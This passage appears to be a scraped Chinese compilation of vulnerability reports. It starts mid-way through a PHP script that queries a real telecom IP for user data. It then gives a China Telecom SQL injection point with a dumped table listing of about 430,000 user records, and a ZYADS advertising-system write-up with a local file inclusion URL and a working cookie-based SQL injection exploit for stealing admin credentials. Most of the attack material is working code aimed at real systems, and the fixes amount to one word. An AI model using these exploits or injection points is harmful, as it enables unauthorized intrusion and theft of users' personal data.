';return '';}$mystr = 'userName='.$username.'&srcUrl=www.baidu.com&policyId=1375&srcIp='.randip().'&type=0';$mystr = base64_encode($mystr);$url = '121.32.136.50:701/gz_20141028/guangzhou/20141028/thirdconfirm.aspx?param=AB'.$mystr;// echo $url;// $html = file_get_contents($url);$myc = curl_init();$headers = array( 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/0101 Firefox/28.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Connection: Keep-Alive ', 'DNT: 1', ); curl_setopt($myc, CURLOPT_HEADER, false); curl_setopt($myc, CURLOPT_HTTPHEADER,$headers); curl_setopt($myc, CURLOPT_URL,$url); curl_setopt($myc, CURLOPT_RETURNTRANSFER,true); curl_setopt($myc, CURLOPT_TIMEOUT, 10); $html = curl_exec($myc); curl_close($myc);if(empty($html)){echo 'contents empty
';return '';}$html = getCon($html, 'UserBirthday“>', '', true);echo $html;}main();?>经测试,发现是Oracle数据库解决方案:过滤啊篇2:运营商安全之中国电信某站SQL注入(涉及9个库,43万
运营商安全之中国电信某站SQL注入漏洞存在注入URL**.**.**.**:9080/home/index.action?recStaff=dldxzqkhb&storeId=13464&systemId=1参数systemId为注入点涉及9个库
400多个表,43万用户数据
Database: OTO_JT+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| ATTRINST | 1491899 || SCHEDULE_JOB_LOG | 1324602 || USERS | 430913 || STORECENT_0512 | 286340 || TB_MINI_PAGE_PICTURE_0512| 159625 || STORECENT | 151211 || TB_MINI_REQUEST_LOG| 129173 || TB_MINI_WEBSITE_LOG| 98924 || CATGPENREL | 90268 || LISTPRICE_0512 | 88093 || OFFER_0512 | 88076 || CATENTRY_0512| 86675 || TB_FR_SERV_CALL_LOG| 73342 || CATENTREL_0512 | 71678 || TB_SM_PRIVGRANTS | 57851 || BP_STEPTASK | 49539 || TB_MINI_TRAN_CONFIG_0512 | 35697 || TB_MINI_WEBSITE_PAGE_0512| 34729 || CPORD_ITEMS | 34380 || BP_TASK| 28874 || ADDRBOOK | 27375 || ORDER_COMMENT| 26679 || PPC_PAYMENT | 26236 || PACK_STATLOG | 25299 || CATENTRY_0918| 24768 || CATENTREL | 22484 || CATENTREL_0922 | 22417 || CATENTREL_0918 | 19134 || PACKITEMS | 18236 || TB_CMS_RESOURCE | 17801 || PROMO_CDPOOL | 17366 || ORDER_APPLYINFO | 16636 || SCHEDULE_BUSIPROC_LOG | 15907 || ORDER_INVOICE| 15655 || TB_CMS_CHANNEL | 14774 || SALEINFO_ITEM| 13682 || ORDERITEMS_0512 | 11304 || CPORD_CRM_SUB| 11024 || LISTPRICE | 11018 || OFFER | 11002 || CATENTRY | 9488 || PROMO_USAGE | 9418 || CRM_PROCESS_ORDERS | 9412 || TB_PM_OPER_LOG | 9194 || CPORD_WAIT_SENDBACK_HIST | 8936 || TB_MINI_WEBSITE_STYLE_0512 | 8268 || TB_MINI_WEBSITE_STYLE_0428 | 8226 || TB_MINI_PAGE_PICTURE | 8096 || TB_MINI_PAGE_ATTR_0512 | 6696 || PHONENUMBER | 6564 || TB_SM_STAFFPOST_0512 | 6491 || STAT_ORDERITEMS_SETTLEMENT | 6226 || TB_SM_STAFFPOST_20150428 | 6117 || USER_LOGIN_LOG | 5980 || PACKINFO | 5790 || TB_SM_MINI_PRIVGRANTS | 5658 || TB_SM_MINI_PRIVGRANTS_0512 | 5570 || TB_SM_MINI_PRIVGRANTS_20150506 | 5568 || TB_MINI_PUBLISH_TASK_HIST| 5314 || USERREG| 5183 || USERPROF | 5182 || SHIPINFO | 5164 || ADDRESS| 5163 || INVENTORY | 5102 || TB_SM_MINI_PRIVGRANTS_20150428 | 5050 || TB_SM_SYSSTAFF_0512| 4845 || ORDER_CATENTRY_REL_0512 | 4843 || ORDERS_0512 | 4632 || TB_SM_LOGINSESS | 4560 || TB_SM_SYSSTAFF_20150428 | 4506 || TB_MINI_CAT_TYPE | 4480 || PROMO_ELEATTR_INST | 4116 || STOREPMD | 3946 || CPORD_CRM_APPLY | 3882 || TB_MINI_STAFF_REC_0512 | 3874 || STOREPMD_0512| 3824 || ORDERITEM_ADJUST | 3736 || ORDER_ADJUST | 3729 || ORDERITEMS_0918 | 3397 || CPORD_CALL_LOG | 3379 || TB_MINI_WEBSITE_STYLE_0918 | 3223 || TB_SM_LOGINSESS_HIST | 3163 || STOREPMD_20150428 | 3148 || TB_MINI_REGION | 3147 || TB_MINI_REGION_20150428 | 3147 || STORERELA_0512 | 3107 || STORE_0512 | 3063 || TB_MINI_PAGE_TEXT_0512 | 2813 || SALEINFO_REG | 2800 || STORERELA_20150428 | 2742 || STORE_20150428 | 2695 || TB_MINI_WEBSITE_0512 | 2629 || TB_MINI_WEBSITE_20150428 | 2592 || PROMO_ELERELA| 2549 || TB_MINI_WEBSITE_PAGE | 2373 || STORERELA_0918 | 2262 || STORE_0918 | 2220 || TB_SM_WORKPOST | 2125 || TB_MINI_PAGE_ATTR_0918 | 2104 || STOREPMD_0918| 2068 || CATGROUP | || TB_SM_SYSSTAFF_0918| 1968 || TB_MINI_REPORT | 1877 || TB_SM_MINI_PRIVGRANTS_0918 | 1771 || PPC_PAYINST | 1707 || TB_MINI_WEBSITE_LOG_0512 | 1619 || CATGRPREL | 1504 || STORECGRP | 1459 || CATENTRY_RELA| 1453 || TB_MINI_STAFF_REC_0918 | 1433 || ORDER_CATENTRY_REL_0918 | 1423 || STAT_ORDERS_SETTLEMENT | 1421 || TB_MINI_TRAN_CONFIG| 1407 || UPLOADFILE | 1383 || ORDERS_0918 | 1226 || TB_FR_ANALY_CUST_LOGIN | 1145 || ORDERITEMS | 1099 || IP_LATN_RELA | 1018 || TB_MINI_WEBSITE_0918 | 1016 || TB_MINI_QUESTION_DETAIL | 933 || TB_SM_SYSSTAFF | 905 || TB_SM_STAFFPOST | 887 || TB_MINI_ANALYSE | 800 || TB_MINI_PAGE_TEXT_0918 | 771 || PRIZE | 700 || INV_ADJUST | 685 || ORDER_CATENTRY_REL | 631 || CPORD_ASSIGNMENT | 604 || STORERELA | 599 || STORE | 554 || PNB_CHECK_INFO | 487 || TB_MINI_WEBSITE_STYLE. 486 || MODCOMPS_ACTION | 476 || CPORD_COMMENT| 471 || TB_PC_DICT | 466 || TB_MINI_PAGE_ATTR | 449 || SHPARRANGE | 442 || TMP_ACTION_LINK | 423 || TB_MINI_STAFF_WEBSITESTYLE. 408 || ACTION_LINK | 393 || CATEN_CRM_RELA | 382 || STAT_PPC_PAYINST | 381 || TB_SM_ORGAN | 358 || TB_PC_CITY | 326 || TB_PC_CITY_20150428| 325 || CITY | 323 || CITY_20150428| 323 || PROMO_TRIGGER| 319 || PRIZE_CODE_SEQ | 318 || TB_MINI_ARTICLE | 313 || FRAME_TB_CONFIG_CONTENT | 305 || PNB_STATLOG | 274 || CALLBACK_ORDER_RELA| 273 || TB_SM_MODCOMPS | 260 || ORDERS | 255 || PLAN_INFO_SETTING | 247 || ATTRIBUTE | 230 || FRAME_TB_INTERFACE_INIT_PARA | 229 || TB_FR_SERV_USER_AUTH | 226 || TB_FR_SERV_METHOD | 215 || TB_MINI_STAFF_REC | 211 || TB_SM_SYSMENU| 191 || TB_MINI_QUESTION_CUST | 187 || CALCODE| 174 || TB_SM_ERRLOGIN | 167 || TB_MINI_EXCEL_LOG | 154 || PROMO_ADDINFO| 152 || PROMOTION | 152 || CATEN_CRM_EQPT | 148 || ORDER_STATLOG| 145 || TB_SM_WORKPOST_20150428 | 144 || ORDER_CATEN_SOLD | 140 || SMS_SEND_QUEUE_HIST| 139 || TB_SM_MODULE | 135 || CALLBACKS | 134 || TB_MINI_WEBSITE | 120 || TB_MINI_STANDARD | 119 || SANALY_CATENTRY | 109 || TB_MINI_STAFF_REL_0512 | 104 || EXPORTFILE | 103 || SHIP_STATLOG | 101 || TB_FR_ANALY_ORDER_INFO | 92|| TB_PC_DICTTYPE | 87|| TB_MINI_PAGE_TEXT | 84|| TB_MINI_STAFF_REL_0918 | 83|| BP_TRANS | 77|| TB_MINI_PUBLISH_OBJ_RELA | 74|| ORDER_INVOICE_BAK | 72|| TB_FR_SERVINFO | 69|| ATTRVALUE | 66|| PROMO_STATLOG| 66|| BRAND | 63|| CATCLASS_BRAND | 62|| STAT_DOWNLOAD_FILES| 62|| PROMO_CDUSAGE| 60|| FRAME_TB_CONFIG_TYPE | 56|| TB_MINI_STAFF_REL | 54|| BP_FLOWSTEP | 53|| TB_MINI_QUESTION_TITLE_ITEM | 48|| TEST1 | 48|| PNBINV_WARN | 45|| FRAME_TB_INTERFACE_CONFIG| 44|| TB_MINI_PAGE_TEXT_BAKPAJT| 43|| BP_ACTION | 42|| FFMCENTER | 42|| FRAME_TB_INTERFACE_EVENT | 42|| INV_WARN | 41|| IP_WHITE | 40|| TB_MINI_TALK_ABOUT | 40|| TB_MINI_NOTICE_ROLES | 38|| CATCOMMENT | 36|| CATCOMMT_SCORE | 36|| FFMCENTER_PMD| 35|| TEST2 | 34|| WS_STAFF_SETTING | 33|| PROVINCE | 31|| PROVINCE_20150428 | 31|| TB_MINI_APPROVE | 31|| TB_MINI_PAGE_CAT | 28|| PROMO_ELEATTR| 26|| TB_SM_ORGAN_20150428 | 26|| SHIPMODE | 25|| SCHEDULE_JOB | 24|| TB_PC_LOG_CONFIG | 24|| PROMO_CDSPEC | 23|| STORECAT | 23|| TMP_CATGROUP | 23|| FRAME_TB_SM_ORGAN | 22|| SUPPLIER | 22|| QTYUNIT| 21|| TB_SM_ORGTYPE| 21|| ATTRVALUE_TYPE | 20|| BP_STEP| 20|| TB_MINI_QUESTION_TITLE | 19|| PROMO_ELEMENT| 18|| SANALY_TYPE | 18|| SHIPMENT_PAYMENT_LISTS | 18|| UPLOADFILE_SETTING | 18|| SEARCH_FILTER_ATTG_CHANNELREL | 17|| CATCLASS | 15|| TB_CMS_ARTICLE | 15|| ATTRGRP| 14|| TB_CMS_PUBLISH_TASK_HIST | 14|| ACTIVITY | 13|| TB_MINI_PAGE | 13|| PPC_PAYMETHOD| 12|| PRIZE_RESULT | 11|| SEARCH_FILTER_ATTRGROUPREL | 11|| SEARCH_FILTER_ATTRS| 11|| TB_CMS_PUBLISH_TASK| 11|| ORDER_BSNTYPE| 10|| ORDER_BSNTYPE_FLOW | 10|| PNB_CHECK_INFO_HIST| 10|| SHIPPER| 10|| TB_CMS_RESOURCE_LOG| 10|| TB_MINI_NOTICE | 10|| ”CATALOG“ | 9 || PROMO_PUBCD | 9 || SEARCH_FILTER_GROUP| 9 || TB_CMS_APPROVE | 9 || TB_CMS_APPROVE_ACT | 9 || PROMO_PROMOTYPE | 8 || TB_CMS_ARTICLE_EXTATTR | 8 || TB_MINI_QUESTION_CONF | 8 || BP_FLOW| 7 || LISTS_RECORDS| 7 || TMP_ROLE_POST| 7 || CATACT_RELA | 6 || SEARCH_FILTER_GROUPS | 6 || SEARCH_FILTER_GROUPSREL | 6 || SYS_ID_SERIAL| 6 || TB_CMS_APPREVENT_PRIVI | 6 || TB_MINI_QUESTION | 6 || TB_MINI_WEBSITE_SYN_HIST | 6 || TB_CMS_TEMPLATE_ATTR | 5 || TB_MINI_STYLE_SYSTEM | 5 || TB_MINI_WX_TOKEN | 5 || REFUNDMENT_LISTS | 4 || SEARCH_FILTER_USAGE| 4 || TB_MINI_PUBLISH_TASK | 4 || BP_BUSITYPE | 3 || CPORD_WAIT_ACCNBR | 3 || FRAME_TBSYSTEMSTATICVALUE| 3 || PNB_LOCKED | 3 || PNB_RESERVE | 3 || PROMO_GROUP | 3 || SEARCH_FILTER_MATCH_TYPE | 3 || SEND_TEMPLATE| 3 || TB_CMS_ARTICLE_ATTRVALUE | 3 || TB_CMS_RESOURCE_PAGE | 3 || TB_CMS_TEMPLATE | 3 || TB_MINI_STYLE. 3 || TB_SM_ORGAN_HIST | 3 || BP_FLOWRULE | 2 || EXPORTFILE_SETTING | 2 || OBJCACHE_SETTING | 2 || PAYMENT_LISTS| 2 || STAGEPAY_CHECK | 2 || TB_MINI_WEBSITE_TEMPLATE | 2 || CALRULE| 1 || CALVALUE | 1 || CPORD_WAIT_SENDBACK| 1 || FRAME_TB_FILTER_PARAM | 1 || FRAME_TB_FILTER_URL| 1 || PRIZE_RATE | 1 || SHPAREA| 1 || TB_CMS_TAG | 1 || TB_CMS_TAG_RELA | 1 || TB_FR_SERV_USER | 1 || TB_MINI_PICTUREMANAGER | 1 |+--------------------------------+---------+
修复方案:
过滤篇3:中易广告联盟系统(ZYADS) sql注入和本地包含漏洞
中易广告联盟系统(ZYADS) sql注入和本地包含漏洞
在index/news.php 1-31行include_once(”top.php“);
$newsid = intval($_GET['id']);
$to_type = addslashes($_GET['type']);
if ($to_type=='index')
{
$to_type_s =” and to_type=1“;
}
if ($to_type=='webuser')
{
$to_type_s =” and to_type!=3“;
}
if ($to_type=='webadver')
{
$to_type_s =” and to_type!=2“;
}
$newssql = 'select * from zyads_news WHERE `id` ='' . $newsid . ''
'.$to_type_s.'';
$newsre=$db->query($newssql);
$newsrow = $db->fetch_array($newsre);
if (empty($newsrow)){
zyads_message('zyads_news');
}
?>
可以看到$to_type没定义或者不等于index,webuser,webadver的话 那么$to_type_s是没有定义的
这时候我们就可以提交一个$to_type_s变量来进行sql注入,简单的注入,呵呵。
在/code/adview_cpa_html.php 1-46行
/*********************/
/* */
/* Version : 5.1.0 */
/* Author : RM */
/* Comment : 071223 */
/* */
/*********************/
_obfuscate_JQYdYn1jfBI( );
define( ”IN_ZYADS“, TRUE );
$name = $_GET['name'];
$adid = $_GET['adid'];
$offsetwidth = $_GET['offsetwidth'];
$site = $_GET['site'];
$click_url = ”www.erzhi.cn“;
$count_url = ”www.erzhi.cn“;
if ( empty( $name ) || empty( $adid ) || empty( $site ) )
{
exit( ”广告出错“ );
}
@require( ”../user/c/“.$name.”/user_info.php“ );
require( ”../include/soft_class.php“ );
require( ”../include/settings.php“ );
$code = new _obfuscate_Y2xpZW50( );
$getip = $code->_obfuscate_Z2V0aXA( );
$getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( );
$getos = $code->_obfuscate_Z2V0b3M( );
$maketime = time( ) + $setting['zyads_date'] * 3600;
$maketime = $maketime;
$strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA(
$getip.”|“.$maketime.”|“.$getbrowse.”|“.$getos, $setting['url_pwd'] );
$strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas );
if ( $zyads_users['flag'] != 2 )
{
echo ”document.write('帐号被锁定');“;
exit( );
}
if ( _obfuscate_Cx96BhhwZxABPA8( ”../cache/cpa/“.$adid.”.php“ ) )
{
require( ”../cache/cpa/“.$adid.”.php“ );
}
else
{
exit( ”文件丢失-“.$adid.”.php“ );
}
$name,$adid这两个变量都能造成本地包含漏洞
不过$adid好利用点,
exp:/code/adview_cpa_html.php?name=admin&adid=../../index&site=www.xxx.com
最后附上一个exp,只是简单的cookie提交参数 为了隐蔽点 呵呵
//by q1ur3n
//team: www.wolvez.org
//exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23
//敏感信息表信息:
/*
DROP TABLE IF EXISTS zyads_admin;
CREATE TABLE zyads_admin (
id int(11) NOT NULL auto_increment,
username varchar(20) NOT NULL,
pwd varchar(50) NOT NULL,
login_num int(11) NOT NULL,
last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
islock int(1) NOT NULL,
ip varchar(20) NOT NULL,
admin_flag varchar(200) NOT NULL,
addtime datetime NOT NULL,
PRIMARY KEY (id)
);
*/
$host = $_GET['site'];
$cmd='to_type_s='.urlencode(stripcslashes($_REQUEST[”id“]));
$message = ”GET /index/news.php?id=89 HTTP/1.1 “;
$message .= ”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-
shockwave-flash, */* “;
$message .= ”Referer: www.baidu.com/ “;
$message .= ”Accept-Language: zh-cn “;
$message .= ”Content-Type: application/x-www-form-urlencoded “;
$message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) “;
$message .= ”Host: $host “;
$message .= ”Connection: Close “;
$message .= ”Cookie: “.$cmd.” ";
//echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
fclose($fp);
?>
